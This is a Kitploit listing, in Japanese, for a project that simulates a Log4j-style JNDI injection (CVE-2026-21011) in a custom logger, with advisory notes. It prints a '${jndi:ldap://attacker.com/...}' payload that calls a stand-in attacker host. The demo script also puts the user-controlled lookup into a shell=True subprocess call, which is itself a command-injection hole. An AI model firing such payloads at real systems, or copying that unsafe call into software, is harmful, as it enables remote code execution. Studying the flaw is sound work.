Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — CVE-2026-21011(カスタムロガーにおけるLog4jスタイルのJNDIインジェクション)をシミュレートします。${jndi:...} パターンを解析し、LDAPによってトリガーされるリモートコード実行を実証します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

CVE-2026-21011(カスタムロガーにおけるLog4jスタイルのJNDIインジェクション)をシミュレートします。${jndi:...} パターンを解析し、LDAPによってトリガーされるリモートコード実行を実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
16日前未レビュー

CVE-2026-21011 – カスタムロガーにおけるLog4j形式のJNDIインジェクション(シミュレーション)

プログラムコード(PythonによるJavaシミュレーション)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – カスタムロガーを介したJNDIインジェクション

Severity: Critical

概要

カスタムロギングフレームワークは、悪名高いLog4Shellの脆弱性と同様に、ログメッセージ内の${jndi:...}パターンを評価します。攻撃者はJNDIルックアップを注入して、リモートサーバーから任意のコードをロードおよび実行できます。

脆弱性の詳細

  • タイプ: コードインジェクション / JNDIインジェクション
  • 影響: リモートコード実行。
  • 根本原因: ロガーがユーザー制御のデータを解析し、その内容に基づいて動的ルックアップを実行するため。

エクスプロイトのデモ

シミュレーションを実行します:

root@kitploit:~
python log4j_sim.py

このスクリプトは、攻撃者のLDAPサーバーからクラスをロードすることを表示します。

ツールをダウンロード